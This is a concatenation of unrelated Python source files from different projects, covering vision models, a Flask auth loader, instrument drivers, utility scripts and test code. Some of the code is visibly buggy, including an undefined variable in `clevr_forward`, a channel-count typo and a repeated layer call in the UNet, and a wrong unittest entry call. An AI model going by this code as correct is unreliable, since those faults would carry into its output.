__C.HIDDEN_SIZE) def vizwiz_init(self, __C): imgfeat_linear_size = __C.FEAT_SIZE['vqa']['FRCN_FEAT_SIZE'][1] if __C.USE_BBOX_FEAT: self.bbox_linear = nn.Linear(5, __C.BBOXFEAT_EMB_SIZE) imgfeat_linear_size += __C.BBOXFEAT_EMB_SIZE self.frcn_linear = nn.Linear(imgfeat_linear_size, __C.HIDDEN_SIZE) def gqa_init(self, __C): imgfeat_linear_size = __C.FEAT_SIZE['gqa']['FRCN_FEAT_SIZE'][1] if __C.USE_BBOX_FEAT: self.bbox_linear = nn.Linear(5, __C.BBOXFEAT_EMB_SIZE) imgfeat_linear_size += __C.BBOXFEAT_EMB_SIZE self.frcn_linear = nn.Linear(imgfeat_linear_size, __C.HIDDEN_SIZE) if __C.USE_AUX_FEAT: self.grid_linear = nn.Linear(__C.FEAT_SIZE['gqa']['GRID_FEAT_SIZE'][1], __C.HIDDEN_SIZE) def clevr_init(self, __C): self.grid_linear = nn.Linear(__C.FEAT_SIZE['clevr']['GRID_FEAT_SIZE'][1], __C.HIDDEN_SIZE) def vqa_forward(self, feat_dict): frcn_feat = feat_dict['FRCN_FEAT'] bbox_feat = feat_dict['BBOX_FEAT'] img_feat_mask = make_mask(frcn_feat) if self.__C.USE_BBOX_FEAT: bbox_feat = self.bbox_proc(bbox_feat) bbox_feat = self.bbox_linear(bbox_feat) frcn_feat = torch.cat((frcn_feat, bbox_feat), dim=-1) img_feat = self.frcn_linear(frcn_feat) rel_embed = self.relation_embedding(bbox_feat) return img_feat, rel_embed, img_feat_mask def vizwiz_forward(self, feat_dict): frcn_feat = feat_dict['FRCN_FEAT'] bbox_feat = feat_dict['BBOX_FEAT'] img_feat_mask = make_mask(frcn_feat) if self.__C.USE_BBOX_FEAT: bbox_feat = self.bbox_proc(bbox_feat) bbox_feat = self.bbox_linear(bbox_feat) frcn_feat = torch.cat((frcn_feat, bbox_feat), dim=-1) img_feat = self.frcn_linear(frcn_feat) rel_embed = self.relation_embedding(bbox_feat) return img_feat, rel_embed, img_feat_mask def gqa_forward(self, feat_dict): frcn_feat = feat_dict['FRCN_FEAT'] bbox_feat = feat_dict['BBOX_FEAT'] grid_feat = feat_dict['GRID_FEAT'] img_feat_mask = make_mask(frcn_feat) if self.__C.USE_BBOX_FEAT: bbox_feat = self.bbox_linear(bbox_feat) frcn_feat = torch.cat((frcn_feat, bbox_feat), dim=-1) img_feat = self.frcn_linear(frcn_feat) if self.__C.USE_AUX_FEAT: grid_feat_mask = make_mask(grid_feat) img_feat_mask = torch.cat((img_feat_mask, grid_feat_mask), dim=-1) grid_feat = self.grid_linear(grid_feat) img_feat = torch.cat((img_feat, grid_feat), dim=1) rel_embed = self.relation_embedding(bbox_feat) return img_feat, rel_embed, img_feat_mask def clevr_forward(self, feat_dict): grid_feat = feat_dict['GRID_FEAT'] img_feat_mask = make_mask(grid_feat) img_feat = self.grid_linear(grid_feat) rel_embed = self.relation_embedding(bbox_feat) return img_feat, rel_embed, img_feat_mask koneksys/aras-oslcoslc_api/auth/__init__.py import logging from flask import make_response, request, g from flask_login import LoginManager, user_loaded_from_request, user_loaded_from_header from oslc_api.auth.client import ArasAPI from oslc_api.rest_api.custom_session import CustomSessionInterface logger = logging.getLogger(__name__) aras_api = ArasAPI() login = LoginManager() @login.request_loader def load_user_from_request(request): logger.debug('Looking for X-ARAS-ACCESS-TOKEN header') user = None access_token = request.headers.get('X-ARAS-ACCESS-TOKEN') if access_token: if aras_api.user and aras_api.user.access_token == access_token: user = aras_api.user logger.debug(f'X-ARAS-ACCESS-TOKEN: {user}') return user @user_loaded_from_request.connect def user_loaded_from_request(self, user=None): logger.debug(f'login_via_header: {True}') g.login_via_header = True @user_loaded_from_header.connect def user_loaded_from_header(self, user=None): logger.debug(f'login_via_header: {True}') g.login_via_header = True @login.unauthorized_handler def unauthorized(): data = { 'message': 'The resource is protected, you should authenticate to be able to access it' } logger.debug(f'Unauthenticated user : {data}') resp = make_response(data, 401) return resp def init_app(app): client_id = app.config['OAUTH_CLIENT_ID'] aras_base_api_uri = app.config['SOURCE_BASE_API_URI'] aras_database = app.config['SOURCE_DATABASE'] logger.debug("Initializing OAuth for: {}".format(client_id)) login.init_app(app) aras_api.init_app(app, aras_base_api_uri, 'Innovator', client_id, aras_database) app.session_interface = CustomSessionInterface() """ ================================== || , 2020 || || github: orsveri || ================================== This is the implementation of UNet models. Based on: [github.com/petrosgk/Kaggle-Carvana-Image-Masking-Challenge], which was based on this PyTorch implementation: [https://www.kaggle.com/c/carvana-image-masking-challenge/discussion/37208] TODO: now only model for input shape of 1024 implemented; check and add other options """ import torch from torch import nn class BlockDownsampling(nn.Module): def __init__(self, input_channels, output_channels, end_with_pooling=True): super(BlockDownsampling, self).__init__() self.end_with_pooling = end_with_pooling self.conv1 = nn.Conv2d(in_channels=input_channels, out_channels=output_channels, kernel_size=(3, 3), stride=1, padding=1, bias=True, padding_mode='zeros') self.bn1 = nn.BatchNorm2d(num_features=output_channels) self.relu = nn.ReLU() self.conv2 = nn.Conv2d(in_channels=output_channels, out_channels=output_channels, kernel_size=(3, 3), stride=1, padding=1, bias=True, padding_mode='zeros') self.bn2 = nn.BatchNorm2d(num_features=output_channels) if end_with_pooling: self.pool = nn.MaxPool2d(kernel_size=(2, 2), stride=2) def forward(self, x): x = self.conv1(x) x = self.bn1(x) x = self.relu(x) x = self.conv2(x) x = self.bn2(x) x_link = self.relu(x) if self.end_with_pooling: x = self.pool(x_link) return x, x_link else: return x_link class BlockUpsampling(nn.Module): def __init__(self, input_channels, output_channels): super(BlockUpsampling, self).__init__() self.up1 = nn.Upsample(size=(2, 2)) self.conv1 = nn.Conv2d(in_channels=input_channels*2, out_channels=output_channels, kernel_size=(3, 3), stride=1) self.bn1 = nn.BatchNorm2d(num_features=output_channels) self.relu = nn.ReLU() self.conv2 = nn.Conv2d(in_channels=input_channels * 2, out_channels=output_channels, kernel_size=(3, 3), stride=1) self.bn2 = nn.BatchNorm2d(num_features=output_channels) self.conv3 = nn.Conv2d(in_channels=input_channels * 2, out_channels=output_channels, kernel_size=(3, 3), stride=1) self.bn3 = nn.BatchNorm2d(num_features=output_channels) def forward(self, x, x_link): x = self.up1(x) x = torch.cat((x_link, x), dim=1) # concatenate along channels dimension x = self.conv1(x) x = self.bn1(x) x = self.relu(x) x = self.conv2(x) x = self.bn2(x) x = self.relu(x) x = self.conv2(x) x = self.bn2(x) x = self.relu(x) return x class UNet(nn.Module): def __init__(self, nb_classes, input_shape): super(UNet, self).__init__() self.down1 = BlockDownsampling(input_channels=3, output_channels=8, end_with_pooling=True) self.down2 = BlockDownsampling(input_channels=8, output_channels=16, end_with_pooling=True) self.down3 = BlockDownsampling(input_channels=16, output_channels=32, end_with_pooling=True) self.down4 = BlockDownsampling(input_channels=32, output_channels=64, end_with_pooling=True) self.down5 = BlockDownsampling(input_channels=64, output_channels=128, end_with_pooling=True) self.down6 = BlockDownsampling(input_channels=126, output_channels=256, end_with_pooling=True) self.down7 = BlockDownsampling(input_channels=256, output_channels=512, end_with_pooling=True) self.center = BlockDownsampling(input_channels=512, output_channels=1024, end_with_pooling=False) self.up7 = BlockUpsampling(input_channels=1024, output_channels=512) self.up6 = BlockUpsampling(input_channels=512, output_channels=256) self.up5 = BlockUpsampling(input_channels=256, output_channels=128) self.up4 = BlockUpsampling(input_channels=128, output_channels=64) self.up3 = BlockUpsampling(input_channels=64, output_channels=32) self.up2 = BlockUpsampling(input_channels=32, output_channels=16) self.up1 = BlockUpsampling(input_channels=16, output_channels=8) self.final_conv = nn.Conv2d(in_channels=8, out_channels=nb_classes, kernel_size=(1, 1), stride=1) if nb_classes == 1: self.final_activation = nn.Sigmoid() else: self.final_activation = nn.Softmax() def forward(self, x): x, x1_link = self.down1(x) x, x2_link = self.down2(x) x, x3_link = self.down3(x) x, x4_link = self.down4(x) x, x5_link = self.down5(x) x, x6_link = self.down6(x) x, x7_link = self.down7(x) x = self.center(x) x = self.up7(x=x, x_link=x7_link) x = self.up6(x=x, x_link=x6_link) x = self.up5(x=x, x_link=x5_link) x = self.up4(x=x, x_link=x4_link) x = self.up3(x=x, x_link=x3_link) x = self.up2(x=x, x_link=x2_link) x = self.up1(x=x, x_link=x1_link) x = self.final_conv(x) x = self.final_activation(x) return x class Node: def __init__(self, val): self.val = val self.left = None self.right = None def serialize(root): nodes = [] curr_q = [root] next_level = True if root else False while next_level and curr_q: next_q = [] next_level = False for node in curr_q: if node: nodes.append(str(node.val)) if node.left or node.right: next_level = True next_q.append(node.left) next_q.append(node.right) else: nodes.append(str(node)) curr_q = next_q next_q = [] return ','.join(nodes) def deserialize(tree): if not tree: return None nodes = [None if n == 'None' else int(n) for n in tree.split(',')] root = Node(nodes.pop(0)) curr_q = [root] while nodes and curr_q: parent = curr_q.pop(0) left_node = nodes.pop(0) if left_node != None: parent.left = Node(left_node) curr_q.append(parent.left) right_node = nodes.pop(0) if right_node != None: parent.right = Node(right_node) curr_q.append(parent.right) return root def display_tree(root): if not root: return level = 0 curr_q = [root] print_line = True while print_line and curr_q: print_line = False next_q = [] level += 1 print('Level:', level) for node in curr_q: if node == None: print('None', end=',') else: print(node.val, end=',') next_q.append(node.left) next_q.append(node.right) if node.left or node.right: print_line = True print('') curr_q = next_q # test 1 print('Test 1') root = Node(1) root.left = Node(2) root.right = Node(3) root.right.left = Node(4) root.right.right = Node(5) serialized_tree = serialize(root) assert serialized_tree == '1,2,3,None,None,4,5' deserialized_tree = deserialize(serialized_tree) display_tree(deserialized_tree) print('') # test 2 print('Test 2') root = Node(1) serialized_tree = serialize(root) assert serialized_tree == '1' deserialized_tree = deserialize(serialized_tree) display_tree(deserialized_tree) print('') # test 3 print('Test 3') root = None serialized_tree = serialize(root) assert serialized_tree == '' deserialized_tree = deserialize(serialized_tree) display_tree(deserialized_tree) print('') # test 4 print('Test 4') root = Node(1) root.left = Node(2) root.right = Node(3) root.left.left = Node(4) root.left.right = Node(5) serialized_tree = serialize(root) assert serialized_tree == '1,2,3,4,5,None,None' deserialized_tree = deserialize(serialized_tree) display_tree(deserialized_tree) print('') # 670. Maximum Swap # https://leetcode.com/problems/maximum-swap import unittest class Solution(object): def maximumSwap(self, num): """ :type num: int :rtype: int """ arr = list(str(num)) size = len(arr) if size == 1: return num for i in range(size): for j in range(i + 1, size): self.swap(arr, i, j) val = int(''.join(arr)) if val > num: num = val self.swap(arr, i, j) return num def swap(self, arr, i, j): arr[i], arr[j] = arr[j], arr[i] class TestMaximumSwap(unittest.TestCase): def test(self): sol = Solution() self.assertEqual( sol.maximumSwap(2736), 7236 ) self.assertEqual( sol.maximumSwap(1), 1 ) self.assertEqual( sol.maximumSwap(10), 10 ) if __name__ == '__main__': unittest.TestCase() """ Qudev specific driver for the UHFQA instrument. """ import logging import time import pycqed.instrument_drivers.physical_instruments.ZurichInstruments.UHFQA_core as uhf log = logging.getLogger(__name__) class UHFQA_qudev(uhf.UHFQA_core): """This is the Qudev specific PycQED driver for the 1.8 GSa/s UHFQA instrument from Zurich Instruments AG. """ USER_REG_FIRST_SEGMENT = 5 USER_REG_LAST_SEGMENT = 6 def __init__(self, name, device: str, interface: str = 'USB', address: str = '127.0.0.1', port: int = 8004, nr_integration_channels: int = 10, server: str = '', **kw) -> None: """ Input arguments: name: (str) name of the instrument device (str) the name of the device e.g., "dev8008" interface (str) the name of the interface to use ('1GbE' or 'USB') address (str) the host where the ziDataServer is running (for compatibility) port (int) the port to connect to for the ziDataServer (don't change) nr_integration_channels (int) the number of integration channels to use (max 10) server: (str) the host where the ziDataServer is running (if not '' then used instead of address) """ t0 = time.time() super().__init__(name=name, device=device, interface=interface, address=address, server=server, port=port, nr_integration_channels=nr_integration_channels, **kw) t1 = time.time() log.info(f'{self.devname}: Initialized UHFQA_qudev in {t1 - t0:.3f}s') def acquisition_initialize(self, samples, averages, loop_cnt, channels=(0, 1), mode='rl') -> None: # Define the channels to use and subscribe to them self._acquisition_nodes = [] if mode == 'rl': for c in channels: path = self._get_full_path('qas/0/result/data/{}/wave'.format(c)) self._acquisition_nodes.append(path) self.subs(path) # Enable automatic readout self.qas_0_result_reset(1) self.qas_0_result_enable(0) self.qas_0_result_length(samples) self.qas_0_result_averages(averages) ro_mode = 0 else: for c in channels: path = self._get_full_path('qas/0/monitor/inputs/{}/wave'.format(c)) self._acquisition_nodes.append(path) self.subs(path) # Enable automatic readout self.qas_0_monitor_reset(1) self.qas_0_monitor_enable(1) self.qas_0_monitor_length(samples) self.qas_0_monitor_averages(averages) ro_mode = 1 self.set('awgs_0_userregs_{}'.format(uhf.UHFQA_core.USER_REG_LOOP_CNT), loop_cnt) self.set('awgs_0_userregs_{}'.format(uhf.UHFQA_core.USER_REG_RO_MODE), ro_mode) from __future__ import print_function, division import sys import re import numpy as np import matplotlib.pyplot as plt def is_eff(stdout_file): """ IS Speedup R / I / Total: 1239.74 (30 of 37465) / 40.43 (8 of 338) / 48094.08 (263 of 12663170)""" pattern = ' IS Speedup R / I / Total:' compiled_pattern = re.compile(pattern) grid_r = [] grid_i = [] grid_total = [] is_r = [] is_i = [] is_total = [] speedup_r = [] speedup_i = [] speedup_total = [] with open(stdout_file) as stdout_file: for line in stdout_file: splited_line = compiled_pattern.split(line) if len(splited_line) >= 2: speedup = splited_line[1].rstrip() speedup = speedup.replace('(', ' ').replace(')', ' ') speed_data = speedup.split() # print(speed_data) speedup_r.append(float(speed_data[0])) is_r.append(float(speed_data[1])) grid_r.append(float(speed_data[3])) speedup_i.append(float(speed_data[5])) is_i.append(float(speed_data[6])) grid_i.append(float(speed_data[8])) speedup_total.append(float(speed_data[10])) is_total.append(float(speed_data[11])) grid_total.append(float(speed_data[13])) iteration = np.arange(len(speedup_r)) fig, ax = plt.subplots(nrows=3, sharex=True, figsize=(8, 9)) ax[0].plot(iteration, is_r, label='grid by importance sampling') ax[0].plot(iteration, grid_r, label='size of grid') ax[0].legend() ax[0].set_ylabel('number of projections') ax[1].plot(iteration, is_r, label='importance sampling') ax[2].plot(iteration, speedup_r, label='speedup', color='g') ax[2].legend() ax[2].set_xlabel('Iteration: #') ax[2].set_ylabel('speedup factor') fig.suptitle(r'Importance Sampling with $(\phi, \theta)$ (dir on sphere)') fig, ax = plt.subplots(nrows=3, sharex=True, figsize=(8, 9)) ax[0].plot(iteration, is_i, label='grid by importance sampling') ax[0].plot(iteration, grid_i, label='size of grid') ax[0].legend() ax[0].set_ylabel('number of projections') ax[1].plot(iteration, is_i, label='importance sampling') ax[2].plot(iteration, speedup_i, label='speedup', color='g') ax[2].legend() ax[2].set_xlabel('Iteration: #') ax[2].set_ylabel('speedup factor') fig.suptitle(r'Importance Sampling with $(\psi)$ (inplane-rotation)') fig, ax = plt.subplots(nrows=3, sharex=True, figsize=(8, 9)) ax[0].plot(iteration, is_total, label='grid by importance sampling') ax[0].plot(iteration, grid_total, label='size of grid') ax[0].legend() ax[0].set_ylabel('number of projections') ax[1].plot(iteration, is_total, label='importance sampling') ax[2].plot(iteration, speedup_total, label='speedup', color='g') ax[2].legend() ax[2].set_xlabel('Iteration: #') ax[2].set_ylabel('speedup factor') fig.suptitle(r'Importance Sampling (Total)') plt.show() if __name__ == '__main__': stdout = sys.argv[1] is_eff(stdout) #For documentation refer to my Github: https://github.com/Zylence/m3u-Playlist-Creation-Script import os from optparse import OptionParser def scanDirectories(): """Scans 'startDirectory' and all subdirectories for all files listed in 'acceptedFormats' and writes them to a dictionary mapping files to a list of paths. """ foundFiles = dict() for root, dirs, files in os.walk(startDirectory): if os.path.split(root)[1] not in excludeDirectories: for file in files: if os.path.splitext(file)[1] in acceptedFormats: foundFiles.setdefault(file, []).append(root) return foundFiles def createPathsHelper(filename, path): """Returns an absolute or relative path according to the'absolutePaths' variable. """ if absolutePaths: return str(path + "/" + filename) else: return str(path.split(startDirectory)[1] + "/" + filename) def createPaths(files): """Takes a dictionary of files mapping to paths. Returns a list of absolute or relative paths with duplicates either removed or not. """ resPaths = [] for filename, paths in files.items(): # paths is a list if removeDuplicates: # discard all but the first path resPaths.append(createPathsHelper(filename, paths[0])) else: # keep all paths for path in paths: resPaths.append(createPathsHelper(filename, path)) return resPaths def writePlaylist(paths): """Writes all the 'paths' into a playlist file named 'fileName' using 'mode' as method of writing. """ f = open(fileName, mode, encoding=codec) for path in paths: f.write(path + "\n") f.close() if __name__ == "__main__": # args parsing parser = OptionParser() parser.add_option("-n", metavar="fileName", default="playlist.m3u", help="the name of your playlist, use '.m3u' extension") parser.add_option("-m", metavar="mode", default="w", help="mode used for writing, choose 'a' to append, and 'w' to overwrite the playlist file") parser.add_option("-c", metavar="codec", default="utf-8", help="codec used for opening (writing) a file") parser.add_option("-s", metavar="startDirectory", default=os.getcwd(), help="the starting directory for the script to scan for music files, usually your music library") parser.add_option("-e", metavar="excludedDirectories", default="", help="string containing subdirectories separated by whitespaces, e.g.: 'Celtic Classic' will " "not be included in the playlist") parser.add_option("-d", metavar="removeDuplicates", default=False, help="boolean determining whether or not to exclude duplicate files from the playlist") parser.add_option("-a", metavar="absolutePaths", default=True, help="boolean determining whether to use absolute paths") parser.add_option("-f", metavar="acceptedFormats", default=".mp3 .flac .wav .aac", help="string containing file formats separated by whitespaces, e.g.: '.mp3 .flac'") (options, args) = parser.parse_args() # if you prefer hard coding - edit those assignments fileName = options.n mode = options.m codec = options.c startDirectory = options.s excludeDirectories = options.e.split() removeDuplicates = options.d acceptedFormats = options.f.split() absolutePaths = options.a # main script foundFiles = scanDirectories() paths = createPaths(foundFiles) writePlaylist(paths) lazythumbs/tests/__init__.py from lazythumbs.tests.test_server import RenderTest, GetViewTest from lazythumbs.tests.test_templatetag import LazythumbSyntaxTest, LazythumbGeometryCompileTest, LazythumbRenderTest from lazythumbs.tests.test_templatetag import ImgAttrsRenderTest from lazythumbs.tests.test_util import TestGeometry, TestComputeIMG, TestGetImgAttrs, TestGetFormat """ This package contains functionality that is shared among the parts of the Optimal BPM system """jmonsalverodilla/heroku_deploy_iris0 ###################THIS FILE DOES NOT WORK################# import requests import html_to_json #URL = "https://modelo-prueba.herokuapp.com/result" url = "http://127.0.0.1:8080/result" data = {'a':1, 'b':2, 'c':3, 'd':4} ####################Alternativa1############################### r = requests.post(url,data=data) r_json = html_to_json.convert(r.content) print(r_json) prob = r_json['body'][0]['div'][0]['div'][0]['h3'][0]['_value'] print(prob)import torch.nn as nn import segmentation_models_pytorch as smp import torch from torch.cuda.amp import autocast class seg_qyl(nn.Module): def __init__(self, model_name, n_class): super(seg_qyl,self).__init__() self.model = smp.Unet(# UnetPlusPlus encoder_name=model_name, # choose encoder, e.g. mobilenet_v2 or efficientnet-b7 encoder_weights='imagenet', # use `imagenet` pretrained weights for encoder initialization in_channels=3, # model input channels (1 for grayscale images, 3 for RGB, etc.) classes=n_class, # model output channels (number of classes in your dataset) decoder_attention_type='se' ) # self.deep_stem_layer = self._make_stem_layer(self.model.encoder.conv1.in_channels, self.model.encoder.conv1.out_channels, # self.model.encoder._norm_layer).to( # torch.device(self.model.encoder.conv1.weight.device)) def _make_stem_layer(self, in_channels, stem_channels, norm_layer): """Make stem layer for ResNet. self.deep_stem:""" return nn.Sequential( nn.Conv2d( in_channels, stem_channels // 2, kernel_size=3, stride=2, padding=1, bias=False), norm_layer(stem_channels // 2), nn.ReLU(inplace=True), nn.Conv2d( stem_channels // 2, stem_channels // 2, kernel_size=3, stride=1, padding=1, bias=False), norm_layer(stem_channels // 2), nn.ReLU(inplace=True), nn.Conv2d( stem_channels // 2, stem_channels, kernel_size=3, stride=1, padding=1, bias=False), norm_layer(stem_channels), nn.ReLU(inplace=True)) @autocast() def forward(self, x): stages = self.model.encoder.get_stages() # stages[1] = self.deep_stem_layer features = [] for i in range(self.model.encoder._depth + 1): x = stages[i](x) features.append(x) # features = self.model.encoder(x) decoder_output = self.model.decoder(*features) masks = self.model.segmentation_head(decoder_output) if self.model.classification_head is not None: labels = self.model.classification_head(features[-1]) return masks, labels return maskscpgames/modules/core/bomberman/modules/__init__.py '''initialize''' from .map import mapParser from .misc import showText, Button, Interface from .sprites import Wall, Background, Fruit, Bomb, Herowebgui/retronas_webgui/data/install_things.py # AUTO-GENERATED: not for manual editing INSTALL_CHOOSER_OPTIONS = [ { "id": "cockpit-web-based-linux-system-manager", "text": "Cockpit web based Linux system manager", "description": None, "commands": "COMMANDS TODO", }, { "id": "etherdfs", "text": "EtherDFS", "description": "lightweight layer 2 network file sharing for DOS", "commands": "COMMANDS TODO", }, { "id": "gogrepo", "text": "gogrepo", "description": "Download your GOG game installers", "commands": "COMMANDS TODO", }, { "id": "lighttpd", "text": "lighttpd", "description": "HTTP/Web server", "commands": "COMMANDS TODO", }, { "id": "microsoft-xbox360-smb-config", "text": "Microsoft XBox360 SMB config", "description": None, "commands": "COMMANDS TODO", }, { "id": "mister-fpga-cifs-config", "text": "MiSTer FPGA CIFS config", "description": None, "commands": "COMMANDS TODO", }, { "id": "netatalk2", "text": "Netatalk2", "description": "AppleTalk and AppleShare file sharing", "commands": "COMMANDS TODO", }, { "id": "netatalk3", "text": "Netatalk3", "description": "Apple AFP file sharing TCP/IP only", "commands": "COMMANDS TODO", }, { "id": "nfs", "text": "NFS", "description": "NFS versions 2, 3 and 4", "commands": "COMMANDS TODO", }, { "id": "nintendo-3ds-qr-code-generator-for-fbi-homebrew", "text": "Nintendo 3DS QR code generator for FBI Homebrew", "description": None, "commands": "COMMANDS TODO", }, { "id": "openssh", "text": "OpenSSH", "description": "SSH/SFTP/SCP Secure Shell command line and file transfer", "commands": "COMMANDS TODO", }, { "id": "proftpd", "text": "ProFTPd", "description": "FTP, File Transfer Protocol file sharing", "commands": "COMMANDS TODO", }, { "id": "rom-import-from-smokemonster-smdbs", "text": "ROM import from Smokemonster SMDBs", "description": None, "commands": "COMMANDS TODO", }, { "id": "samba", "text": "Samba", "description": "LANMan, NTLMv1/v2, NetBIOS, SMB1/2/3, CIFS file sharing", "commands": "COMMANDS TODO", }, { "id": "sony-ps2-openps2loader-smb-config", "text": "Sony PS2 OpenPS2Loader SMB config", "description": None, "commands": "COMMANDS TODO", }, { "id": "sony-ps3-ps3netsrv-for-cfw-hen---webman-mod", "text": "Sony PS3 ps3netsrv for CFW/HEN + webMAN-MOD", "description": None, "commands": "COMMANDS TODO", }, { "id": "syncthing-file-sync-tool", "text": "Syncthing file sync tool", "description": None, "commands": "COMMANDS TODO", }, { "id": "telnet", "text": "Telnet", "description": "unencrypted remote access shell", "commands": "COMMANDS TODO", }, { "id": "tftpd-hpa", "text": "tftpd-hpa", "description": "TFTP, Trivial File Transfer Protocol file sharing", "commands": "COMMANDS TODO", }, { "id": "tnfs-for-atari-8-bit-and-zx-spectrum", "text": "TNFS for Atari 8-bit and ZX Spectrum", "description": None, "commands": "COMMANDS TODO", }, { "id": "webone", "text": "WebOne", "description": "HTTP 1.x proxy for a HTTP 2.x world", "commands": "COMMANDS TODO", }, ] 0 # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import logging.config import os from notification_service.server_config import NotificationServerConfig # We hard code the logging config, we should make it configurable in the future. logging.config.dictConfig({ 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'default': { 'format': '[%(asctime)s - %(filename)s:%(lineno)d [%(threadName)s] - %(levelname)s: %(message)s', } }, 'handlers': { 'console': { 'class': 'logging.StreamHandler', 'stream': 'ext://sys.stderr', 'formatter': 'default' } }, 'root': { 'level': 'INFO', 'handlers': ['console'] } }) def get_notification_home(): if 'NOTIFICATION_HOME' in os.environ: home = os.getenv('NOTIFICATION_HOME') else: home = os.getenv('HOME') + '/notification_service' return home NOTIFICATION_HOME = get_notification_home() NOTIFICATION_PID_FILENAME = 'notification_server.pid' def get_configuration_file_path(notification_home=None): if not notification_home: notification_home = NOTIFICATION_HOME config_file_path = notification_home + '/notification_server.yaml' if not os.path.exists(config_file_path): raise FileNotFoundError('Do not find config file {}'.format(config_file_path)) return config_file_path def get_configuration(): config_file_path = get_configuration_file_path() return NotificationServerConfig(config_file=config_file_path) 1-10 import os, fire, json, sys import numpy as np import random as rn import tensorflow as tf sys.path.append(os.getcwd()) from ml_earthquake import collect_data from ml_earthquake import preprocess from ml_earthquake import train def set_random_seed(s): os.environ['PYTHONHASHSEED'] = '0' np.random.seed(s) rn.seed(s) session_conf = tf.ConfigProto( # intra_op_parallelism_threads=1, # inter_op_parallelism_threads=1 ) from keras import backend as K tf.set_random_seed(s) sess = tf.Session(graph=tf.get_default_graph(), config=session_conf) K.set_session(sess) return sess def main( recipe='recipe.json', recipe_id=None, data_dir='data', out_dir='out', work_dir='work', log_dir='log', random_seed=4126): if not os.path.exists(recipe): raise Exception('recipe: {} does not exists...'.format(recipe)) data_path = os.path.join( data_dir, 'earthquakes.csv') if not os.path.exists(data_path): print('collecting earthquake data...') collect_data(data_path) with open(recipe, 'r', encoding='utf-8') as f: recipe_obj = json.load(f) sess = None for r in recipe_obj['recipe']: if recipe_id is not None and recipe_id != r['id']: continue if sess is not None: sess.close() tf.reset_default_graph() sess = set_random_seed(random_seed) print('start preprocess and train for recipe ID: {}'.format(r['id'])) X_train, y_train, X_test, y_test, info_train, info_test = preprocess( data_path, r['window_days'], r['predict_range_days'], r['lat_granularity'], r['lng_granularity'], r['predict_center_lat'], r['predict_center_lng'], r['predict_radius_meters'], r['threshold_mag'], cache_dir=work_dir ) train( X_train, y_train, X_test, y_test, info_train=info_train, info_test=info_test, out_dir=os.path.join(out_dir, r['id']), log_dir=log_dir, learning_rate=r['learning_rate'] if 'learning_rate' in r else 5e-6, decay=r['decay'] if 'decay' in r else 0.0, epochs=r['epochs'], dropout=r['dropout'], random_state=random_seed, resampling_methods=r['resampling_methods'] if 'resampling_methods' in r else None, balanced_batch=r['balanced_batch'] if 'balanced_batch' in r else None ) if __name__ == '__main__': fire.Fire(main) snownlp/seg/seg.py # -*- coding: utf-8 -*- from __future__ import print_function from __future__ import unicode_literals import codecs from ..utils.tnt import TnT from .y09_2047 import CharacterBasedGenerativeModel class Seg(object): def __init__(self, name='other'): if name == 'tnt': self.segger = TnT() else: self.segger = CharacterBasedGenerativeModel() def save(self, fname, iszip=True): self.segger.save(fname, iszip) def load(self, fname, iszip=True): self.segger.load(fname, iszip) def train(self, fname): fr = codecs.open(fname, 'r', 'utf-8') data = [] for i in fr: line = i.strip() if not line: continue tmp = map(lambda x: x.split('/'), line.split()) data.append(tmp) fr.close() self.segger.train(data) def seg(self, sentence): ret = self.segger.tag(sentence) tmp = '' for i in ret: if i[1] == 'e': yield tmp+i[0] tmp = '' elif i[1] == 'b' or i[1] == 's': if tmp: yield tmp tmp = i[0] else: tmp += i[0] if tmp: yield tmp if __name__ == '__main__': seg = Seg() seg.train('data.txt') print(' '.join(seg.seg('主要是用来放置一些简单快速的中文分词和词性标注的程序'))) 1-10 import win32com.client import os def register_task(scheduler, state_change, name, command, arguments): folder = scheduler.GetFolder('\\') definition = scheduler.NewTask(0) TASK_TRIGGER_SESSION_STATE_CHANGE = 11 trigger = definition.Triggers.Create(TASK_TRIGGER_SESSION_STATE_CHANGE) trigger.StateChange = state_change TASK_ACTION_EXEC = 0 action = definition.Actions.Create(TASK_ACTION_EXEC) action.Path = command action.Arguments = arguments TASK_CREATE_OR_UPDATE = 6 TASK_LOGON_NONE = 0 NO_USER = '' NO_PASSWORD = '' folder.RegisterTaskDefinition(name, definition, TASK_CREATE_OR_UPDATE, NO_USER, NO_PASSWORD, TASK_LOGON_NONE) script = os.path.abspath('..\log.py') scheduler = win32com.client.Dispatch('Schedule.Service') scheduler.Connect() TASK_SESSION_LOCK = 7 TASK_SESSION_UNLOCK = 8 register_task(scheduler, TASK_SESSION_LOCK, 'Lock Logging', 'C:\\Windows\\pyw.exe' , script + ' lock') register_task(scheduler, TASK_SESSION_UNLOCK, 'Unlock Logging', 'C:\\Windows\\pyw.exe' , script + ' unlock') 10-100 import sys try: import cPickle as pickle except: import pickle import numpy as np class SignedDensityField(object): """ Data is stored in the following way data[x, y, z] """ def __init__(self, data, origin, delta): self.data = data self.nx, self.ny, self.nz = data.shape self.origin = origin self.delta = delta self.max_coords = self.origin + delta * np.array(data.shape) def _rel_pos_to_idxes(self, rel_pos): i_min = np.array([0, 0, 0], dtype=np.int) i_max = np.array([self.nx - 1, self.ny - 1, self.nz - 1], dtype=np.int) return np.clip(((rel_pos - self.origin) / self.delta).astype(int), i_min, i_max) def get_distance(self, rel_pos): rel_pos = np.reshape(rel_pos, (-1, 3)) idxes = self._rel_pos_to_idxes(rel_pos) assert idxes.shape[0] == rel_pos.shape[0] return self.data[idxes[:, 0], idxes[:, 1], idxes[:, 2]] def dump(self, pkl_file): data = {} data['data'] = self.data data['origin'] = self.origin data['delta'] = self.delta with open(pkl_file, 'wb') as file: pickle.dump(data, file, protocol=2) def visualize(self, max_dist=0.1): try: from mayavi import mlab except: raise Exception("mayavi is not installed!") figure = mlab.figure('Signed Density Field') SCALE = 100 # The dimensions will be expressed in cm for better visualization. data = np.copy(self.data) data = np.minimum(max_dist, data) xmin, ymin, zmin = SCALE * self.origin xmax, ymax, zmax = SCALE * self.max_coords delta = SCALE * self.delta xi, yi, zi = np.mgrid[xmin:xmax:delta, ymin:ymax:delta, zmin:zmax:delta] data[data <= 0] -= 0.2 data = -data 